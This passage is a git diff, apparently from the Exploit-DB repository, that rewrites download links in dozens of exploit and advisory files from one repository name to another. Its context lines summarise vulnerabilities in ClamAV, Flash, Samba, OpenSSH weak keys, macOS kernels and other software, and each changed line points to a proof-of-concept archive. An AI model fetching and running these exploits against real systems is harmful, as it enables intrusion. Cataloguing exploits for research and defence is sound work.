(12262006-proftpd-not-pro-enough.tar.gz) # milw0rm.com [2003-10-15] \ No newline at end of file diff --git a/exploits/linux/remote/30291.txt b/exploits/linux/remote/30291.txt index b8d0eab03..6a39da65c 100644 --- a/exploits/linux/remote/30291.txt +++ b/exploits/linux/remote/30291.txt @@ -11,4 +11,4 @@ ClamAV prior to 0.91 Other applications using the vulnerabile 'UnRAR' utility are affected by this issue. We will update this BID as more information emerges. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30291.rar \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30291.rar \ No newline at end of file diff --git a/exploits/linux/remote/30543.txt b/exploits/linux/remote/30543.txt index 7e0065f31..755a2b62a 100644 --- a/exploits/linux/remote/30543.txt +++ b/exploits/linux/remote/30543.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex Doomsday Engine 1.90-beta5.1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30543.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30543.zip \ No newline at end of file diff --git a/exploits/linux/remote/30728.txt b/exploits/linux/remote/30728.txt index 0818ffa90..6308734dd 100644 --- a/exploits/linux/remote/30728.txt +++ b/exploits/linux/remote/30728.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to inject and execute arbitrary malicious Per Yarssr 0.2.2 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30728.rss \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30728.rss \ No newline at end of file diff --git a/exploits/linux/remote/30907.txt b/exploits/linux/remote/30907.txt index f6ca54bca..3e7cd9b76 100644 --- a/exploits/linux/remote/30907.txt +++ b/exploits/linux/remote/30907.txt @@ -8,4 +8,4 @@ This issue affects Adobe Flash Player 9.0.48.0, 8.0.35.0, and prior versions. NOTE: This issue was previously disclosed in BID 26929 (Adobe Flash Player Multiple Security Vulnerabilities) but has been assigned its own BID because new technical details are available. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30907.as \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30907.as \ No newline at end of file diff --git a/exploits/linux/remote/30971.txt b/exploits/linux/remote/30971.txt index 03ba361ce..f26129401 100644 --- a/exploits/linux/remote/30971.txt +++ b/exploits/linux/remote/30971.txt @@ -9,4 +9,4 @@ Successfully exploiting these issues allows remote attackers to execute arbitrar Georgia SoftWorks Secure Shell Server 7.01.0003 is vulnerable to these issues; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30971.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30971.zip \ No newline at end of file diff --git a/exploits/linux/remote/31591.txt b/exploits/linux/remote/31591.txt index 6ef402b18..d8beb771a 100644 --- a/exploits/linux/remote/31591.txt +++ b/exploits/linux/remote/31591.txt @@ -6,4 +6,4 @@ Exploiting this issue allows an attacker to access arbitrary files outside of th LANDesk Management Suite 8.80.1.1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31591.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31591.zip \ No newline at end of file diff --git a/exploits/linux/remote/31630.txt b/exploits/linux/remote/31630.txt index 9354f97c2..5526145fd 100644 --- a/exploits/linux/remote/31630.txt +++ b/exploits/linux/remote/31630.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to execute arbitrary code in the context of t Adobe Flash Player 9.0.115.0 and earlier versions are affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31630.rar \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31630.rar \ No newline at end of file diff --git a/exploits/linux/remote/32012.txt b/exploits/linux/remote/32012.txt index 595c1b27a..4bd73a132 100644 --- a/exploits/linux/remote/32012.txt +++ b/exploits/linux/remote/32012.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues can allow an attacker to execute arbitrary Netrw 125 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32012.tar.bz2 \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32012.tar.bz2 \ No newline at end of file diff --git a/exploits/linux/remote/32133.txt b/exploits/linux/remote/32133.txt index 63c7335ce..aaf06b0e7 100644 --- a/exploits/linux/remote/32133.txt +++ b/exploits/linux/remote/32133.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to execute arbitrary code with the privileges This issue affects libxslt 1.1.8 to 1.1.24. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32133.xsl \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32133.xsl \ No newline at end of file diff --git a/exploits/linux/remote/32225.txt b/exploits/linux/remote/32225.txt index 58bd665bb..bdaf3354c 100644 --- a/exploits/linux/remote/32225.txt +++ b/exploits/linux/remote/32225.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to execute arbitrary code with the privileges This issue affects Vim 6.2.429 through 6.3.058. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32225.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32225.zip \ No newline at end of file diff --git a/exploits/linux/remote/32691.txt b/exploits/linux/remote/32691.txt index d35c373fe..75d690420 100644 --- a/exploits/linux/remote/32691.txt +++ b/exploits/linux/remote/32691.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary machine code in the cont This issue affects libaudiofile 0.2.6; other versions may also be vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32691.wav \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32691.wav \ No newline at end of file diff --git a/exploits/linux/remote/33032.txt b/exploits/linux/remote/33032.txt index 3c0128a50..2497567cc 100644 --- a/exploits/linux/remote/33032.txt +++ b/exploits/linux/remote/33032.txt @@ -7,4 +7,4 @@ Successful exploits may allow remote attackers to execute arbitrary code or caus Versions prior to 'Compress::Raw::Zlib' 2.017 are affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33032.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33032.tar.gz \ No newline at end of file diff --git a/exploits/linux/remote/33313.txt b/exploits/linux/remote/33313.txt index 6f1ce9142..8d2d6be06 100644 --- a/exploits/linux/remote/33313.txt +++ b/exploits/linux/remote/33313.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary code and to cause denial NOTE: This issue was previously covered in BID 36843 (Mozilla Firefox and SeaMonkey MFSA 2009-52 through -64 Multiple Vulnerabilities), but has been assigned its own record to better document it. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33313.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33313.tgz \ No newline at end of file diff --git a/exploits/linux/remote/34192.txt b/exploits/linux/remote/34192.txt index ab69c8d99..e5298fa25 100644 --- a/exploits/linux/remote/34192.txt +++ b/exploits/linux/remote/34192.txt @@ -13,4 +13,4 @@ SeaMonkey 2.0.5 NOTE: This issue was previously covered in BID 41050 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2010-26/27/28/29/30/32 Remote Vulnerabilities) but has been given its own record to better document it. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34192.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34192.zip \ No newline at end of file diff --git a/exploits/linux/remote/34358.txt b/exploits/linux/remote/34358.txt index 237bb7e2f..abc62c97b 100644 --- a/exploits/linux/remote/34358.txt +++ b/exploits/linux/remote/34358.txt @@ -12,4 +12,4 @@ SeaMonkey 2.0.6 NOTE: This issue was previously covered in BID 41824 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2010-34 Through -47 Multiple Remote Vulnerabilities), but has been assigned its own record to better document it. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34358.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34358.zip \ No newline at end of file diff --git a/exploits/linux/remote/35232.txt b/exploits/linux/remote/35232.txt index 9bad576a7..38d25eb35 100644 --- a/exploits/linux/remote/35232.txt +++ b/exploits/linux/remote/35232.txt @@ -4,4 +4,4 @@ Pango is prone to a remote heap-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/35232.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35232.zip \ No newline at end of file diff --git a/exploits/linux/remote/35314.txt b/exploits/linux/remote/35314.txt index fefd2ecd3..5808acafd 100644 --- a/exploits/linux/remote/35314.txt +++ b/exploits/linux/remote/35314.txt @@ -4,4 +4,4 @@ Wireshark is prone to a memory-corruption vulnerability because it fails to prop Successful exploits may allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely crash the application. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/35314.pcap \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35314.pcap \ No newline at end of file diff --git a/exploits/linux/remote/39736.txt b/exploits/linux/remote/39736.txt index 8722f002f..16f2f60c5 100644 --- a/exploits/linux/remote/39736.txt +++ b/exploits/linux/remote/39736.txt @@ -230,7 +230,7 @@ Solution This bug has been fixed in git HEAD [4]. Full Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39736.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39736.zip Footnotes _________ diff --git a/exploits/linux/remote/40916.txt b/exploits/linux/remote/40916.txt index 9fbcb6c09..39c2da122 100644 --- a/exploits/linux/remote/40916.txt +++ b/exploits/linux/remote/40916.txt @@ -181,4 +181,4 @@ package file, without some of the usual information.) Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40916.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40916.zip \ No newline at end of file diff --git a/exploits/linux/remote/43360.py b/exploits/linux/remote/43360.py index e46f86ee1..e76834b60 100755 --- a/exploits/linux/remote/43360.py +++ b/exploits/linux/remote/43360.py @@ -2,7 +2,7 @@ # GoAhead httpd/2.5 to 3.6.5 LD_PRELOAD remote code execution exploit -# EDB Note: Payloads ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43360.zip +# EDB Note: Payloads ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43360.zip # EDB Note: Source ~ https://www.elttam.com.au/blog/goahead/ # EDB Note: Source ~ https://github.com/elttam/advisories/blob/c778394dfe454083ebdfb52f660fd3414ee8adb8/CVE-2017-17562/ diff --git a/exploits/linux/remote/5386.txt b/exploits/linux/remote/5386.txt index 02f6c545f..f98dddf6e 100644 --- a/exploits/linux/remote/5386.txt +++ b/exploits/linux/remote/5386.txt @@ -52,6 +52,6 @@ ** */ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5386.tar.gz (2008-x2_fc6f7f8.tar.gz) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5386.tar.gz (2008-x2_fc6f7f8.tar.gz) # milw0rm.com [2008-04-06] \ No newline at end of file diff --git a/exploits/linux/remote/5622.txt b/exploits/linux/remote/5622.txt index 62b94581f..b069dc0f7 100644 --- a/exploits/linux/remote/5622.txt +++ b/exploits/linux/remote/5622.txt @@ -13,7 +13,7 @@ keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl ***E-DB Note: Mirror ~ https://github.com/g0tmi1k/debian-ssh*** 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2 - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) + https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) 2. Extract it to a directory diff --git a/exploits/linux/remote/5632.rb b/exploits/linux/remote/5632.rb index 1949fe257..9154ffe53 100755 --- a/exploits/linux/remote/5632.rb +++ b/exploits/linux/remote/5632.rb @@ -13,14 +13,14 @@ # # Common Keys: # -# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2) -# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) +# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2) +# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) # # # Usage: # debian_openssh_key_test.rb # -# E-DB Note: See here for an update ~ https://github.com/offensive-security/exploit-database/pull/76/files +# E-DB Note: See here for an update ~ https://github.com/offensive-security/exploitdb/pull/76/files # require 'thread' diff --git a/exploits/linux/remote/5720.py b/exploits/linux/remote/5720.py index 752d89d3f..b7ad61a0d 100755 --- a/exploits/linux/remote/5720.py +++ b/exploits/linux/remote/5720.py @@ -17,7 +17,7 @@ # Autor: hitz - WarCat team (warcat.no-ip.org) # Collaborator: pretoriano # -# 1. Download https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) +# 1. Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) # # 2. Extract it to a directory # diff --git a/exploits/linux/remote/609.txt b/exploits/linux/remote/609.txt index e3ec9a5ba..7ed066f5c 100644 --- a/exploits/linux/remote/609.txt +++ b/exploits/linux/remote/609.txt @@ -1,4 +1,4 @@ Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/609.tar.gz (ximage_zgv.tar.gz) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/609.tar.gz (ximage_zgv.tar.gz) # milw0rm.com [2004-10-28] \ No newline at end of file diff --git a/exploits/linux/remote/7701.txt b/exploits/linux/remote/7701.txt index 802b771f8..45849d65b 100644 --- a/exploits/linux/remote/7701.txt +++ b/exploits/linux/remote/7701.txt @@ -36,6 +36,6 @@ struct versions vers[VERSN] = {"Samba 3.0.x DEBUG",0x80380000,0x8045b000,30*1024} }; -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/7701.zip (2009-lsa.zip) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7701.zip (2009-lsa.zip) # milw0rm.com [2009-01-08] \ No newline at end of file diff --git a/exploits/linux/webapps/30085.txt b/exploits/linux/webapps/30085.txt index b123a024f..9c946ec08 100644 --- a/exploits/linux/webapps/30085.txt +++ b/exploits/linux/webapps/30085.txt @@ -8,7 +8,7 @@ # CVE : No CVE, no patch just 0Day # State : Critical -# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30085.zip (zimbraexploit_rubina119.zip) +# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30085.zip (zimbraexploit_rubina119.zip) ---------------Description----------------- diff --git a/exploits/linux_x86-64/dos/33585.txt b/exploits/linux_x86-64/dos/33585.txt index 9b7331116..7dcfda278 100644 --- a/exploits/linux_x86-64/dos/33585.txt +++ b/exploits/linux_x86-64/dos/33585.txt @@ -8,4 +8,4 @@ Versions prior to Linux kernel 2.6.33-rc6 are vulnerable. NOTE: This issue can be exploited only on 64-bit architectures. Core dumps must be enabled. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33585.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33585.tgz \ No newline at end of file diff --git a/exploits/linux_x86-64/dos/37868.txt b/exploits/linux_x86-64/dos/37868.txt index 358149593..7f28d319a 100644 --- a/exploits/linux_x86-64/dos/37868.txt +++ b/exploits/linux_x86-64/dos/37868.txt @@ -10,4 +10,4 @@ At first glance this might appear to be a NULL dereference but sometimes it cras The base sample from which the fuzz case is derived is also attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37868.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37868.zip \ No newline at end of file diff --git a/exploits/linux_x86-64/dos/37876.txt b/exploits/linux_x86-64/dos/37876.txt index 3ee554890..25fe5e03d 100644 --- a/exploits/linux_x86-64/dos/37876.txt +++ b/exploits/linux_x86-64/dos/37876.txt @@ -36,4 +36,4 @@ function func(){ A SWF and fla are attached. Note that this PoC needs to be run on a webserver on localhost (or change the IP in the PoC to the server value), and it only crashes in Chrome on 64-bit Linux. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37876.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37876.zip \ No newline at end of file diff --git a/exploits/linux_x86-64/dos/37879.txt b/exploits/linux_x86-64/dos/37879.txt index e4d6d0f19..cc778dcdc 100644 --- a/exploits/linux_x86-64/dos/37879.txt +++ b/exploits/linux_x86-64/dos/37879.txt @@ -20,4 +20,4 @@ This looks very like a heap-based buffer overflow that just happens to have walk Also, this bug bears disturbing similarities to CVE-2015-3043, see for example: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37879.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37879.zip \ No newline at end of file diff --git a/exploits/linux_x86-64/dos/37880.txt b/exploits/linux_x86-64/dos/37880.txt index d6e8be33c..f344fdc16 100644 --- a/exploits/linux_x86-64/dos/37880.txt +++ b/exploits/linux_x86-64/dos/37880.txt @@ -20,4 +20,4 @@ rdx 0x160b It looks like an indexing error; the rdi "base" address is in bounds but add on 2*rdx and the address is not in bounds. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37880.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37880.zip \ No newline at end of file diff --git a/exploits/linux_x86-64/local/35472.txt b/exploits/linux_x86-64/local/35472.txt index 07a3423b7..2e06de3f1 100644 --- a/exploits/linux_x86-64/local/35472.txt +++ b/exploits/linux_x86-64/local/35472.txt @@ -43,7 +43,7 @@ by knowing only an address belonging to the application and the offset2lib value +------------------+ The proof of concept exploit code is available here: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/35472.tgz +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35472.tgz http://packetstormsecurity.com/files/129398 +------------------------------------------------------------------------------+ diff --git a/exploits/linux_x86-64/local/36310.txt b/exploits/linux_x86-64/local/36310.txt index b7424e4be..4dcedc471 100644 --- a/exploits/linux_x86-64/local/36310.txt +++ b/exploits/linux_x86-64/local/36310.txt @@ -2,7 +2,7 @@ Sources: http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html https://code.google.com/p/google-security-research/issues/detail?id=283 -Full PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/36310.tar.gz +Full PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36310.tar.gz This is a proof-of-concept exploit that is able to gain kernel privileges on machines that are susceptible to the DRAM "rowhammer" diff --git a/exploits/linux_x86-64/local/36311.txt b/exploits/linux_x86-64/local/36311.txt index 72d1a95de..ca48ad037 100644 --- a/exploits/linux_x86-64/local/36311.txt +++ b/exploits/linux_x86-64/local/36311.txt @@ -2,7 +2,7 @@ Sources: http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html https://code.google.com/p/google-security-research/issues/detail?id=284 -Full PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/36311.tar.gz +Full PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36311.tar.gz This is a proof-of-concept exploit that is able to escape from Native diff --git a/exploits/linux_x86-64/local/40049.c b/exploits/linux_x86-64/local/40049.c index 76850cff5..e56550c8b 100644 --- a/exploits/linux_x86-64/local/40049.c +++ b/exploits/linux_x86-64/local/40049.c @@ -1,5 +1,5 @@ /* -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40053.zip +Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40053.zip */ --------------------------------------------------- decr.c --------------------------------------------------- diff --git a/exploits/linux_x86-64/remote/32277.txt b/exploits/linux_x86-64/remote/32277.txt index 3d6179dab..7ae88fc92 100644 --- a/exploits/linux_x86-64/remote/32277.txt +++ b/exploits/linux_x86-64/remote/32277.txt @@ -18,4 +18,4 @@ This is a generic exploit for 64-bit nginx which uses a new attack technique (BR -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32277.tgz \ No newline at end of file +Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32277.tgz \ No newline at end of file diff --git a/exploits/linux_x86/dos/38763.txt b/exploits/linux_x86/dos/38763.txt index 94d838ed6..71c375f37 100644 --- a/exploits/linux_x86/dos/38763.txt +++ b/exploits/linux_x86/dos/38763.txt @@ -127,4 +127,4 @@ gs 0x63 99 #10 0xf1ca8c1d in net::URLRequestJob::Read (this=0xf9891a00, buf=, buf_size=, bytes_read=0xe75034fc) at ../../net/url_request/url_request_job.cc:126 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38763.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38763.zip \ No newline at end of file diff --git a/exploits/linux_x86/remote/20032.txt b/exploits/linux_x86/remote/20032.txt index eb9537f85..4c4f73629 100644 --- a/exploits/linux_x86/remote/20032.txt +++ b/exploits/linux_x86/remote/20032.txt @@ -4,4 +4,4 @@ Washington University ftp daemon (wu-ftpd) is a very popular unix ftp server shi It should be noted that the SITE INDEX command is affected as well. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20032.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20032.tar.gz \ No newline at end of file diff --git a/exploits/macos/dos/40954.c b/exploits/macos/dos/40954.c index 2176611cb..d4ce58078 100644 --- a/exploits/macos/dos/40954.c +++ b/exploits/macos/dos/40954.c @@ -2,7 +2,7 @@ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=954 Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40954.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40954.zip Userspace MIG services often use mach_msg_server or mach_msg_server_once to implent an RPC server. diff --git a/exploits/macos/dos/42046.txt b/exploits/macos/dos/42046.txt index 594ef5840..42bc77607 100644 --- a/exploits/macos/dos/42046.txt +++ b/exploits/macos/dos/42046.txt @@ -54,4 +54,4 @@ This bug was verified using the following kernel version: root:xnu-3248.60.11.2.1~1/RELEASE_X86_64 x86_64 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42046.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42046.zip \ No newline at end of file diff --git a/exploits/macos/dos/42047.txt b/exploits/macos/dos/42047.txt index 219387fa1..97e9474b1 100644 --- a/exploits/macos/dos/42047.txt +++ b/exploits/macos/dos/42047.txt @@ -25,4 +25,4 @@ addresses on the right are valid kernel stack pointers. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42047.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42047.zip \ No newline at end of file diff --git a/exploits/macos/dos/43415.txt b/exploits/macos/dos/43415.txt index 60df978b8..9c80721ee 100644 --- a/exploits/macos/dos/43415.txt +++ b/exploits/macos/dos/43415.txt @@ -37,4 +37,4 @@ make clean Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43415.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43415.zip \ No newline at end of file diff --git a/exploits/macos/dos/44235.c b/exploits/macos/dos/44235.c index 1e785d26f..6726c0b1b 100644 --- a/exploits/macos/dos/44235.c +++ b/exploits/macos/dos/44235.c @@ -4,7 +4,7 @@ * * Buffer overflow reachable from IOFireWireUserClient::localConfigDirectory_Publish. * - * Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44235.zip + * Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44235.zip */ #include diff --git a/exploits/macos/dos/44236.c b/exploits/macos/dos/44236.c index 9e9442c2c..30feb465f 100644 --- a/exploits/macos/dos/44236.c +++ b/exploits/macos/dos/44236.c @@ -4,7 +4,7 @@ * * NULL pointer dereference in IOFireWireUserClient::setAsyncRef_IsochChannelForceStop. * - * Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44236.zip + * Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44236.zip */ diff --git a/exploits/macos/dos/44561.txt b/exploits/macos/dos/44561.txt index 005a15976..ba7cfc40d 100644 --- a/exploits/macos/dos/44561.txt +++ b/exploits/macos/dos/44561.txt @@ -55,4 +55,4 @@ tested on MacOS 10.13.2 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44561.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44561.zip \ No newline at end of file diff --git a/exploits/macos/local/40669.txt b/exploits/macos/local/40669.txt index 3a3509c58..7cb0a8876 100644 --- a/exploits/macos/local/40669.txt +++ b/exploits/macos/local/40669.txt @@ -246,4 +246,4 @@ Project Zero remains committed to a 90-day disclosure window, and will continue Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40669.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40669.zip \ No newline at end of file diff --git a/exploits/macos/local/40956.c b/exploits/macos/local/40956.c index 1ec095c7a..b031da1ba 100644 --- a/exploits/macos/local/40956.c +++ b/exploits/macos/local/40956.c @@ -2,7 +2,7 @@ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=941 Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40956.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40956.zip The previous ref count overflow bugs were all kinda slow because they were quite deep in kernel code, a lot of mach message and MIG code had to run for each leak. diff --git a/exploits/macos/local/40957.c b/exploits/macos/local/40957.c index 670936da1..8f05e8c89 100644 --- a/exploits/macos/local/40957.c +++ b/exploits/macos/local/40957.c @@ -2,7 +2,7 @@ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=959 Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40957.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40957.zip When sending and receiving mach messages from userspace there are two important kernel objects; ipc_entry and ipc_object. diff --git a/exploits/macos/local/44234.c b/exploits/macos/local/44234.c index d42b4a54f..b00692ffa 100644 --- a/exploits/macos/local/44234.c +++ b/exploits/macos/local/44234.c @@ -45,7 +45,7 @@ * user-specified size. No attempt is made to seed the heap with interesting data. Tested on macOS * High Sierra 10.13 (build 17A365). * - * Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44234.zip + * Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44234.zip * */ #if 0 diff --git a/exploits/macos/local/44237.md b/exploits/macos/local/44237.md index 152cce207..ad3402a8c 100644 --- a/exploits/macos/local/44237.md +++ b/exploits/macos/local/44237.md @@ -62,4 +62,4 @@ The physmem code is released into the public domain. As a courtesy I ask that if use any of this code you attribute it to me. -Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44237.zip \ No newline at end of file +Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44237.zip \ No newline at end of file diff --git a/exploits/macos/remote/42125.txt b/exploits/macos/remote/42125.txt index d3a5a3ddd..e234825ce 100644 --- a/exploits/macos/remote/42125.txt +++ b/exploits/macos/remote/42125.txt @@ -18,4 +18,4 @@ In our exploit we perform step 5 in a separate web worker, so that we can launch Proof of Concept: 